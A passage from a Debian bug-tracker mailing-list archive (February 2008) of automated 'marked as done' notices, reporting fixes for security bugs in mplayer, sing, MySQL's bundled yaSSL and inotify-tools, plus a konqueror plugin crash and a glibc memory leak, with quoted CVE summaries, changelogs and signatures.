OpenJade group
ii  libpcre3  7.4-0ubuntu0.7.10.1Perl 5 Compatible Regular
Expressi
ii  libpng12- 1.2.15~beta5-2ubuntu0.1PNG library - runtime
ii  libqbanki 2.2.3-4QT frontend library for
AqBanking
ii  libqt3-mt 3:3.3.8really3.3.7-0ubuntu11.1 Qt GUI Library (Threaded
runtime v
ii  libsm62:1.0.3-1  X11 Session Management library
ii  libstdc++ 4.2.1-5ubuntu4 The GNU Standard C++ Library v3
ii  libx11-6  2:1.1.1-1ubuntu4   X11 client-side library
ii  libxcurso 1:1.1.8-2  X cursor management library
ii  libxext6  2:1.0.3-2build1X11 miscellaneous extension
librar
ii  libxft2   2.1.12-2ubuntu4FreeType-based font drawing
librar
ii  libxi62:1.1.2-1  X11 Input extension library
ii  libxinera 2:1.0.2-1build1X11 Xinerama extension library
ii  libxrandr 2:1.2.1-1  X11 RandR extension library
ii  libxrende 1:0.9.2-1  X Rendering Extension
client libra
ii  libxt61:1.0.5-3  X11 toolkit intrinsics library
ii  zlib1g1:1.2.3.3.dfsg-5ubuntu2compression library - runtime

kmymoney2 recommends no packages.

-- no debconf information


--- End Message ---
--- Begin Message ---
Source: libchipcard2
Source-Version: 2.1.9-3

We believe that the bug you reported is fixed in the latest version of
libchipcard2, which is due to be installed in the Debian 

Bug#464060: marked as done (CVE-2008-0485/-0486: Vulnerabilities in mplayer)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:21 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#464060: fixed in mplayer 1.0~rc1-12etch2
has caused the Debian Bug report #464060,
regarding CVE-2008-0485/-0486: Vulnerabilities in mplayer
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
464060: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464060
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: mplayer
Version: 1.0~rc1-12
Severity: grave
Tags: security
Justification: user security hole

Two vulnerabilities have been found in mplayer. See 

http://www.securityfocus.com/archive/1/487501/30/0/threaded
http://www.securityfocus.com/archive/1/487500/30/0/threaded

for details and patches.


--- End Message ---
--- Begin Message ---
Source: mplayer
Source-Version: 1.0~rc1-12etch2

We believe that the bug you reported is fixed in the latest version of
mplayer, which is due to be installed in the Debian FTP archive:

mplayer-doc_1.0~rc1-12etch2_all.deb
  to pool/main/m/mplayer/mplayer-doc_1.0~rc1-12etch2_all.deb
mplayer_1.0~rc1-12etch2.diff.gz
  to pool/main/m/mplayer/mplayer_1.0~rc1-12etch2.diff.gz
mplayer_1.0~rc1-12etch2.dsc
  to pool/main/m/mplayer/mplayer_1.0~rc1-12etch2.dsc
mplayer_1.0~rc1-12etch2_i386.deb
  to pool/main/m/mplayer/mplayer_1.0~rc1-12etch2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
A Mennucc1 <[EMAIL PROTECTED]> (supplier of updated mplayer package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Fri,  8 Feb 2008 20:32:41 +0100
Source: mplayer
Binary: mplayer-doc mplayer
Architecture: source i386 all
Version: 1.0~rc1-12etch2
Distribution: stable-security
Urgency: high
Maintainer: A Mennucc1 <[EMAIL PROTECTED]>
Changed-By: A Mennucc1 <[EMAIL PROTECTED]>
Description: 
 mplayer- The Movie Player
 mplayer-doc - documentation for MPlayer
Closes: 464060 464532 464533
Changes: 
 mplayer (1.0~rc1-12etch2) stable-security; urgency=high
 .
   * fix SVN25823 for
 CVE-2008-0630, buffer overflow via crafted url ,
 thanks Niko Golde (closes: #464532)
   * fix SVN25824 for
 CVE-2008-0629, buffer overflow via crafted cddb title
 thanks Niko Golde (closes: #464533)
   * fix for CVE-2008-0485 Array index error in libmpdemux/demux_mov.c
 a.k.a.  CORE-2007-1218: MPlayer 1.0rc2 buffer overflow vulnerability
 thanks Stefan Fritsch
   * fix for CVE-2008-0486 Array index vulnerability in libmpdemux/demux_audio.c
 a.k.a.  CORE-2008-0122: MPlayer arbitrary pointer dereference
 thanks Stefan Fritsch (closes: #464060)
Files: 
 e247c07b25f52ae90c66d1147ed2dad3 1265 graphics optional 
mplayer_1.0~rc1-12etch2.dsc
 4fbe0a18dad58eb0fde6388bfa0fd6fe 82320 graphics optional 
mplayer_1.0~rc1-12etch2.diff.gz
 dcae457fc598d095481ae958b4b2be33 2042982 graphics optional 
mplayer-doc_1.0~rc1-12etch2_all.deb
 fc9d62d80284dcb7501d4aa46d90705f 4556720 graphics optional 
mplayer_1.0~rc1-12etch2_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHrNDw9B/tjjP8QKQRAnaQAJ9CFXIMOOTzZm0l+Vze1HpOrRBVqACdG20v
UvBP/cfX6B7uk/aPAJA1Oko=
=k6y2
-END PGP SIGNATURE-


--- End Message ---


Bug#454167: marked as done (sing: CVE-2007-6211 privilege escalation leading to root access when installed with suid 0)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:28 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#454167: fixed in sing 1.1-13etch1
has caused the Debian Bug report #454167,
regarding sing: CVE-2007-6211 privilege escalation leading to root access when 
installed with suid 0
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
454167: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=454167
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: sing
Version: 1.1-15
Severity: critical
Tags: security

Hi,
Please have a look at:
http://www.securityfocus.com/archive/1/484472

This is really a critical thing if sing was installed with 
suid 0 it allows every user on the system to get root access 
and/or to overwrite arbitrary files.
Please fix.

A CVE id for this issue is pending, I'll add it to this bug 
report if I got it.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpmwQpP6jknE.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---
Source: sing
Source-Version: 1.1-13etch1

We believe that the bug you reported is fixed in the latest version of
sing, which is due to be installed in the Debian FTP archive:

sing_1.1-13etch1.diff.gz
  to pool/main/s/sing/sing_1.1-13etch1.diff.gz
sing_1.1-13etch1.dsc
  to pool/main/s/sing/sing_1.1-13etch1.dsc
sing_1.1-13etch1_i386.deb
  to pool/main/s/sing/sing_1.1-13etch1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Alberto Gonzalez Iniesta <[EMAIL PROTECTED]> (supplier of updated sing package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Tue, 01 Jan 2008 15:45:10 +0100
Source: sing
Binary: sing
Architecture: source i386
Version: 1.1-13etch1
Distribution: stable
Urgency: low
Maintainer: Alberto Gonzalez Iniesta <[EMAIL PROTECTED]>
Changed-By: Alberto Gonzalez Iniesta <[EMAIL PROTECTED]>
Description: 
 sing   - A fully programmable ping replacement
Closes: 454167
Changes: 
 sing (1.1-13etch1) stable; urgency=low
 .
   * Patched parser.c to drop privileges when opening log file and
 running sing SUID. (CVE-2007-6211)
 Thanks a lot to Nico Golde for the patch. (Closes: #454167)
Files: 
 87d5f690162eea6c9117563c634ca14c 597 net optional sing_1.1-13etch1.dsc
 f9f649c4b40174a983601d46e4a3daac 446221 net optional sing_1.1.orig.tar.gz
 ae9156235aea0600fb200d44feb8d984 38590 net optional sing_1.1-13etch1.diff.gz
 4b930ba44f119cc809ac139c2eed2dc0 47498 net optional sing_1.1-13etch1_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHema5xRSvjkukAcMRAl/6AJ0SRw3Vd0dD3Se68aGUZY5H4tlJBQCghhVE
8V0YjiqxM5hRMZQ0Cen61tc=
=98HG
-END PGP SIGNATURE-


--- End Message ---


Bug#444214: marked as done (konqueror-nsplugins: nspluginviewer crashes on amd64 (with explanation of the cause))

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#444214: fixed in kdebase 4:3.5.5a.dfsg.1-6etch2
has caused the Debian Bug report #444214,
regarding konqueror-nsplugins: nspluginviewer crashes on amd64 (with 
explanation of the cause)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
444214: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=444214
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: konqueror-nsplugins
Version: 4:3.5.5a.dfsg.1-6etch1
Severity: grave
Justification: renders package unusable


Nspluginviewer crashes immediately on AMD64 
without displaying anything.

Version 4:3.5.5a.dfsg.1-6etch1 of konqueror-nsplugins
was apparently compiled using an ancient version
of the netscape sdk that declares uint32 as long
on all platforms except the alpha.
This is obviously wrong on amd64.

Related upstream bug:
http://bugs.kde.org/show_bug.cgi?id=150241

Fix:
 Line 190 of npapi.h should be
  #if defined(__alpha) || defined(__x86_64__) || defined(__LP64__)
 instead of
  #if defined(__alpha) 

That's all.

- Leon Bottou



-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-5-amd64
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)

Versions of packages konqueror-nsplugins depends on:
ii  kdelibs4c2a4:3.5.5a.dfsg.1-8 core libraries and binaries for al
ii  libc6  2.3.6.ds1-13etch2 GNU C Library: Shared libraries
ii  libgcc11:4.1.1-21GCC support library
ii  libqt3-mt  3:3.3.7-4 Qt GUI Library (Threaded runtime v
ii  libstdc++6 4.1.1-21  The GNU Standard C++ Library v3
ii  libx11-6   2:1.0.3-7 X11 client-side library
ii  libxt6 1:1.0.2-2 X11 toolkit intrinsics library

konqueror-nsplugins recommends no packages.

-- no debconf information


--- End Message ---
--- Begin Message ---
Source: kdebase
Source-Version: 4:3.5.5a.dfsg.1-6etch2

We believe that the bug you reported is fixed in the latest version of
kdebase, which is due to be installed in the Debian FTP archive:

kappfinder_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kappfinder_3.5.5a.dfsg.1-6etch2_amd64.deb
kate_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kate_3.5.5a.dfsg.1-6etch2_amd64.deb
kcontrol_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kcontrol_3.5.5a.dfsg.1-6etch2_amd64.deb
kdebase-bin_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kdebase-bin_3.5.5a.dfsg.1-6etch2_amd64.deb
kdebase-data_3.5.5a.dfsg.1-6etch2_all.deb
  to pool/main/k/kdebase/kdebase-data_3.5.5a.dfsg.1-6etch2_all.deb
kdebase-dbg_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kdebase-dbg_3.5.5a.dfsg.1-6etch2_amd64.deb
kdebase-dev_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kdebase-dev_3.5.5a.dfsg.1-6etch2_amd64.deb
kdebase-doc-html_3.5.5a.dfsg.1-6etch2_all.deb
  to pool/main/k/kdebase/kdebase-doc-html_3.5.5a.dfsg.1-6etch2_all.deb
kdebase-doc_3.5.5a.dfsg.1-6etch2_all.deb
  to pool/main/k/kdebase/kdebase-doc_3.5.5a.dfsg.1-6etch2_all.deb
kdebase-kio-plugins_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kdebase-kio-plugins_3.5.5a.dfsg.1-6etch2_amd64.deb
kdebase_3.5.5a.dfsg.1-6etch2.diff.gz
  to pool/main/k/kdebase/kdebase_3.5.5a.dfsg.1-6etch2.diff.gz
kdebase_3.5.5a.dfsg.1-6etch2.dsc
  to pool/main/k/kdebase/kdebase_3.5.5a.dfsg.1-6etch2.dsc
kdebase_3.5.5a.dfsg.1-6etch2_all.deb
  to pool/main/k/kdebase/kdebase_3.5.5a.dfsg.1-6etch2_all.deb
kdepasswd_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kdepasswd_3.5.5a.dfsg.1-6etch2_amd64.deb
kdeprint_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kdeprint_3.5.5a.dfsg.1-6etch2_amd64.deb
kdesktop_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kdesktop_3.5.5a.dfsg.1-6etch2_amd64.deb
kdm_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kdm_3.5.5a.dfsg.1-6etch2_amd64.deb
kfind_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kfind_3.5.5a.dfsg.1-6etch2_amd64.deb
khelpcenter_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/khelpcenter_3.5.5a.dfsg.1-6etch2_amd64.deb
kicker_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kicker_3.5.5a.dfsg.1-6etch2_amd64.deb
klipper_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/klipper_3.5.5a.dfsg.1-6etch2_amd64.deb
kmenuedit_3.5.5a.dfsg.1-6etch2_amd64.deb
  to pool/main/k/kdebase/kmenuedit_3.5.5a.dfsg.1-6etch2_amd64.deb
konquer

Bug#460873: marked as done (mysql-dfsg-5.0 multiple vulnerabilities in yassl included by mysql)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:21 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#460873: fixed in mysql-dfsg-5.0 5.0.32-7etch5
has caused the Debian Bug report #460873,
regarding mysql-dfsg-5.0 multiple vulnerabilities in yassl included by mysql
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
460873: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=460873
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: mysql-dfsg-5.0
Severity: grave
Tags: security

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for mysql-dfsg-5.0.

CVE-2008-0227[0]:
| yaSSL 1.7.5 and earlier, as used in MySQL and possibly other products,
| allows remote attackers to cause a denial of service (crash) via a
| Hello packet containing a large size value, which triggers a buffer
| over-read in the HASHwithTransform::Update function in hash.cpp.

CVE-2008-0226[0]:
| Multiple buffer overflows in yaSSL 1.7.5 and earlier, as used in MySQL
| and possibly other products, allow remote attackers to execute
| arbitrary code via (1) the ProcessOldClientHello function in
| handshake.cpp or (2) "input_buffer& operator>>" in yassl_imp.cpp.


If you fix this vulnerability please also include the CVE id
in your changelog entry.

For further information:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0227
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0226

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgp1GzVoylQ7Z.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---
Source: mysql-dfsg-5.0
Source-Version: 5.0.32-7etch5

We believe that the bug you reported is fixed in the latest version of
mysql-dfsg-5.0, which is due to be installed in the Debian FTP archive:

libmysqlclient15-dev_5.0.32-7etch5_i386.deb
  to pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_i386.deb
libmysqlclient15off_5.0.32-7etch5_i386.deb
  to pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_i386.deb
mysql-client-5.0_5.0.32-7etch5_i386.deb
  to pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_i386.deb
mysql-client_5.0.32-7etch5_all.deb
  to pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.32-7etch5_all.deb
mysql-common_5.0.32-7etch5_all.deb
  to pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.32-7etch5_all.deb
mysql-dfsg-5.0_5.0.32-7etch5.diff.gz
  to pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch5.diff.gz
mysql-dfsg-5.0_5.0.32-7etch5.dsc
  to pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch5.dsc
mysql-server-4.1_5.0.32-7etch5_i386.deb
  to pool/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_i386.deb
mysql-server-5.0_5.0.32-7etch5_i386.deb
  to pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_i386.deb
mysql-server_5.0.32-7etch5_all.deb
  to pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.32-7etch5_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Norbert Tretkowski <[EMAIL PROTECTED]> (supplier of updated mysql-dfsg-5.0 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Thu, 24 Jan 2008 09:22:03 +0100
Source: mysql-dfsg-5.0
Binary: libmysqlclient15-dev mysql-client mysql-client-5.0 mysql-server 
mysql-server-4.1 mysql-server-5.0 mysql-common libmysqlclient15off
Architecture: source all i386
Version: 5.0.32-7etch5
Distribution: stable-security
Urgency: high
Maintainer: Christian Hammers <[EMAIL PROTECTED]>
Changed-By: Norbert Tretkowski <[EMAIL PROTECTED]>
Description: 
 libmysqlclient15-dev - mysql database development files
 libmysqlclient15off - mysql database client library
 mysql-client - mysql database client (meta package depending on the latest 
versi
 mysql-client-5.0 - mysql database client binaries
 mysql-common - mysql database common files (e.g. /etc/mysql/my.cnf)
 mysql-server - mysql database server (meta package depending on the latest 
versi
 mysql-server-4.1 - mysql database server (transitional package)
 mysql-server-5.0 - mysql database server binaries
Closes: 460873
Changes: 
 mysql-dfsg-5.0 (5.0.32-7et

Bug#464533: marked as done (mplayer: CVE-2008-0629 buffer overflow via crafted cddb title)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:21 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#464533: fixed in mplayer 1.0~rc1-12etch2
has caused the Debian Bug report #464533,
regarding mplayer: CVE-2008-0629 buffer overflow via crafted cddb title
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
464533: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464533
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Source: mplayer
Severity: grave
Tags: security patch

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for mplayer.

CVE-2008-0629[0]:
| Buffer overflow in stream_cddb.c in MPlayer 1.0rc2 and SVN before
| r25824 allows remote user-assisted attackers to execute arbitrary code
| via a CDDB database entry containing a long album title.

If you fix this vulnerability please also include the CVE id
in your changelog entry.

A fix for this can be found on:
http://svn.mplayerhq.hu/mplayer/trunk/stream/stream_cddb.c?r1=25820&r2=25824

For further information:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0629

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpUod9UHUS8D.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---
Source: mplayer
Source-Version: 1.0~rc1-12etch2

We believe that the bug you reported is fixed in the latest version of
mplayer, which is due to be installed in the Debian FTP archive:

mplayer-doc_1.0~rc1-12etch2_all.deb
  to pool/main/m/mplayer/mplayer-doc_1.0~rc1-12etch2_all.deb
mplayer_1.0~rc1-12etch2.diff.gz
  to pool/main/m/mplayer/mplayer_1.0~rc1-12etch2.diff.gz
mplayer_1.0~rc1-12etch2.dsc
  to pool/main/m/mplayer/mplayer_1.0~rc1-12etch2.dsc
mplayer_1.0~rc1-12etch2_i386.deb
  to pool/main/m/mplayer/mplayer_1.0~rc1-12etch2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
A Mennucc1 <[EMAIL PROTECTED]> (supplier of updated mplayer package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Fri,  8 Feb 2008 20:32:41 +0100
Source: mplayer
Binary: mplayer-doc mplayer
Architecture: source i386 all
Version: 1.0~rc1-12etch2
Distribution: stable-security
Urgency: high
Maintainer: A Mennucc1 <[EMAIL PROTECTED]>
Changed-By: A Mennucc1 <[EMAIL PROTECTED]>
Description: 
 mplayer- The Movie Player
 mplayer-doc - documentation for MPlayer
Closes: 464060 464532 464533
Changes: 
 mplayer (1.0~rc1-12etch2) stable-security; urgency=high
 .
   * fix SVN25823 for
 CVE-2008-0630, buffer overflow via crafted url ,
 thanks Niko Golde (closes: #464532)
   * fix SVN25824 for
 CVE-2008-0629, buffer overflow via crafted cddb title
 thanks Niko Golde (closes: #464533)
   * fix for CVE-2008-0485 Array index error in libmpdemux/demux_mov.c
 a.k.a.  CORE-2007-1218: MPlayer 1.0rc2 buffer overflow vulnerability
 thanks Stefan Fritsch
   * fix for CVE-2008-0486 Array index vulnerability in libmpdemux/demux_audio.c
 a.k.a.  CORE-2008-0122: MPlayer arbitrary pointer dereference
 thanks Stefan Fritsch (closes: #464060)
Files: 
 e247c07b25f52ae90c66d1147ed2dad3 1265 graphics optional 
mplayer_1.0~rc1-12etch2.dsc
 4fbe0a18dad58eb0fde6388bfa0fd6fe 82320 graphics optional 
mplayer_1.0~rc1-12etch2.diff.gz
 dcae457fc598d095481ae958b4b2be33 2042982 graphics optional 
mplayer-doc_1.0~rc1-12etch2_all.deb
 fc9d62d80284dcb7501d4aa46d90705f 4556720 graphics optional 
mplayer_1.0~rc1-12etch2_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHrNDw9B/tjjP8QKQRAnaQAJ9CFXIMOOTzZm0l+Vze1HpOrRBVqACdG20v
UvBP/cfX6B7uk/aPAJA1Oko=
=k6y2
-END PGP SIGNATURE-


--- End Message ---


Bug#443913: marked as done (CVE-2007-5037 buffer overflow in inotifytools_snprintf)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#443913: fixed in inotify-tools 3.3-2
has caused the Debian Bug report #443913,
regarding CVE-2007-5037 buffer overflow in inotifytools_snprintf
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
443913: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=443913
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: inotify-tools
Severity: grave
Tags: security

Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for inotify-tools.

CVE-2007-5037[0]:
| Buffer overflow in the inotifytools_snprintf function in
| src/inotifytools.c in the inotify-tools library before 3.11 allows
| context-dependent attackers to execute arbitrary code via a long
| filename.

If you fix this vulnerability please also include the CVE id
in your changelog entry.

For further information:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5037

Kind regards
Nico

-- 
Nico Golde - http://ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpaoBIB8Tjks.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---
Source: inotify-tools
Source-Version: 3.3-2

We believe that the bug you reported is fixed in the latest version of
inotify-tools, which is due to be installed in the Debian FTP archive:

inotify-tools_3.3-2.diff.gz
  to pool/main/i/inotify-tools/inotify-tools_3.3-2.diff.gz
inotify-tools_3.3-2.dsc
  to pool/main/i/inotify-tools/inotify-tools_3.3-2.dsc
inotify-tools_3.3-2_i386.deb
  to pool/main/i/inotify-tools/inotify-tools_3.3-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Peter Makholm <[EMAIL PROTECTED]> (supplier of updated inotify-tools package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Tue, 25 Sep 2007 08:18:02 +0200
Source: inotify-tools
Binary: inotify-tools
Architecture: source i386
Version: 3.3-2
Distribution: stable-security
Urgency: high
Maintainer: Peter Makholm <[EMAIL PROTECTED]>
Changed-By: Peter Makholm <[EMAIL PROTECTED]>
Description: 
 inotify-tools - command-line programs providing a simple interface to inotify
Closes: 443913
Changes: 
 inotify-tools (3.3-2) stable-security; urgency=high
 .
   * Fixes buffer overflow in inotifytools_snprintf (CVE-2007-5037)
 by backporting changes from new upstream vesion (3.11)
 (Closes: #443913)
Files: 
 883ee55627b7becb5a9ca1a2e569281b 624 misc optional inotify-tools_3.3-2.dsc
 204ef6e0b855ec4315f4f13e2d3d1e1a 369780 misc optional 
inotify-tools_3.3.orig.tar.gz
 7bde9f27b0bb470a44d64b40b1e217e1 5311 misc optional inotify-tools_3.3-2.diff.gz
 e462da2503c92d98510647fb0c1f44eb 78260 misc optional 
inotify-tools_3.3-2_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHdEkXXm3vHE4uyloRAqH2AJ4y5sbLvWAH6M29kJaMuwIU5SOB1QCgoLmr
eWVuFWu5DL6s+rwXeuqf+kQ=
=j6f4
-END PGP SIGNATURE-


--- End Message ---


Bug#460226: marked as done (Memory leak in SUNRPC code)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 12:17:07 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#460226: fixed in glibc 2.3.6.ds1-13etch5
has caused the Debian Bug report #460226,
regarding Memory leak in SUNRPC code
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
460226: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=460226
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: libc6
Version: 2.3.6.ds1-13etch2
Severity: serious
Tags: patch

I've already submitted a patch upstream and it has been integrated.

http://sourceware.org/bugzilla/show_bug.cgi?id=5541

It should be backported to Etch.

-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-4-686
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages libc6 depends on:
ii  tzdata2007b-1Time Zone and Daylight Saving Time

libc6 recommends no packages.

-- debconf-show failed


--- End Message ---
--- Begin Message ---
Source: glibc
Source-Version: 2.3.6.ds1-13etch5

We believe that the bug you reported is fixed in the latest version of
glibc, which is due to be installed in the Debian FTP archive:

